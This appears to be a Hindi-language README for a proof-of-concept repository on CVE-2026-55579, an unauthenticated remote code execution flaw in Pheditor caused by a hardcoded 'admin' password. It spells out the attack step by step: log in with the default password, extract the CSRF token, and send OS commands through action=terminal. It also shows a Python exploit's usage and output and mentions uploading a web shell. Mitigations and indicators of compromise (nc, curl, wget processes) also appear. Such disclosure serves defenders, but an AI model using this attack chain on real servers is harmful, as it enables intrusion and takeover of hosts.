
CVE-2026-55579 – हार्डकोडेड डिफ़ॉल्ट पासवर्ड "admin" के माध्यम से Pheditor में अनधिकृत RCE। फ़ाइल अपलोड और टर्मिनल निष्पादन के साथ पूर्ण Python एक्सप्लॉइट। कोई निर्भरता नहीं।
संक्षेप में: Pheditor (सभी संस्करण) अपने स्रोत कोड में एक हार्डकोडेड डिफ़ॉल्ट व्यवस्थापक पासवर्ड (
admin) के साथ आता है। पहले लॉगिन पर कोई मजबूर पासवर्ड परिवर्तन नहीं है, केवल एक दृश्य चेतावनी है। कोई भी अप्रमाणित हमलावर व्यवस्थापक के रूप में लॉग इन कर सकता है और वेब सर्वर के विशेषाधिकारों के साथ मनमाने OS कमांड को निष्पादित करने के लिए अंतर्निहित टर्मिनल पैनल (action=terminal) का दुरुपयोग कर सकता है। फ़ाइल अपलोड क्षमताओं के साथ मिलकर, यह अप्रमाणित दूरस्थ कोड निष्पादन (RCE) प्रदान करता है।
यह भेद्यता pheditor.php (पंक्ति 11) के अंदर पासवर्ड admin के एक हार्डकोडेड SHA‑512 हैश से उत्पन्न होती है:
define('PASSWORD', 'c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec');
यह हैश इससे मेल खाता है:
echo -n 'admin' | sha512sum
यह गेम ओवर क्यों है:
pheditor.php में पंक्तियाँ 1956–1958)।admin/admin के साथ, एक हमलावर लॉग इन कर सकता है और इसकी पूर्ण पहुँच प्राप्त कर सकता है:
action=terminal)action=upload)action=open/action=save)कोई रेट-लिमिटिंग, कोई लॉकआउट, और कोई अतिरिक्त प्रमाणीकरण कारक नहीं है।
यह हमला अत्यंत सरल है और इसमें शून्य अनुमान की आवश्यकता है:
pheditor.php को pheditor_password=admin के साथ एक POST अनुरोध भेजें। सर्वर एक सत्र कुकी सेट करता है।token जावास्क्रिप्ट चर को पार्स करें।POST अनुरोध भेजें:
action=terminaltoken=<extracted>command=<OS कमांड>dir= (वैकल्पिक)<pre> टैग के अंदर लौटाया जाता है और इसे साफ-साफ पार्स किया जा सकता है।वैकल्पिक रूप से, हमलावर एक वेब शेल अपलोड कर सकता है या एप्लिकेशन फ़ाइलों को अधिलेखित कर सकता है।
आधिकारिक रिपॉजिटरी को क्लोन करें और एक स्थानीय सर्वर प्रारंभ करें:
git clone https://github.com/pheditor/pheditor.git /tmp/pheditor
cd /tmp/pheditor
php -S localhost:8080 pheditor.php &
प्रदान किया गया Python शोषण केवल Python मानक पुस्तकालय पर निर्भर करता है (कोई बाहरी निर्भरता नहीं)। इसमें argparse-आधारित CLI, उन्नत त्रुटि प्रबंधन, वर्बोज़ मोड और टाइमआउट नियंत्रण है।
python3 exploit.py http://localhost:8080/pheditor.php "id; hostname; whoami"
[*] Logging in with password: admin
[+] Login successful
[*] Extracting CSRF token...
[+] Token: a1b2c3d4e5f6...
[*] Executing: id; hostname; whoami
==================================================
Command Output:
==================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ubuntu
www-data
==================================================
सफल शोषण हमलावर को प्रदान करता है:
root) के रूप में चलता है, तो हमलावर होस्ट का पूर्ण नियंत्रण प्राप्त करता है।यह देखते हुए कि Pheditor अक्सर विकास वातावरण में या एक हल्के फ़ाइल प्रबंधक के रूप में उपयोग किया जाता है, हमलावर आसानी से इसे ढूंढ सकते हैं और प्रारंभिक पैठ प्राप्त करने के लिए इसका शोषण कर सकते हैं।
pheditor_password=admin)।समझौते के संकेतकों के लिए अपने वातावरण की निगरानी करें:
pheditor.php को pheditor_password=admin या action=terminal के साथ POST अनुरोध देखें।sh, bash, nc, curl, या wget से संबंधित।शोषण श्रृंखला और अतिरिक्त पेलोड में गहराई से जानकारी के लिए, ANALYSIS.md देखें।
अस्वीकरण: इस रिपॉजिटरी में एक प्रूफ ऑफ कॉन्सेप्ट (PoC) है जो सख्ती से रक्षात्मक, शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। इस कोड का उपयोग उन सिस्टमों के खिलाफ न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानते हैं।
| गुण | विवरण |
|---|
| CVE पहचानकर्ता | CVE-2026-55579 |
| प्रभावित सॉफ्टवेयर | Pheditor (सभी संस्करण वर्तमान HEAD तक) |
| स्थिर संस्करण | अभी तक कोई नहीं (विक्रेता पैच जारी नहीं; वर्कअराउंड आवश्यक) |
| भेद्यता वर्ग | CWE-798: हार्ड-कोडेड क्रेडेंशियल्स का उपयोग |
| CVSS v3.1 स्कोर | 9.8 (गंभीर) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| प्रमाणीकरण | कोई नहीं – डिफ़ॉल्ट क्रेडेंशियल्स सार्वजनिक रूप से ज्ञात हैं |
| सत्यापन | Pheditor की नई स्थापना पर पुष्टि की गई |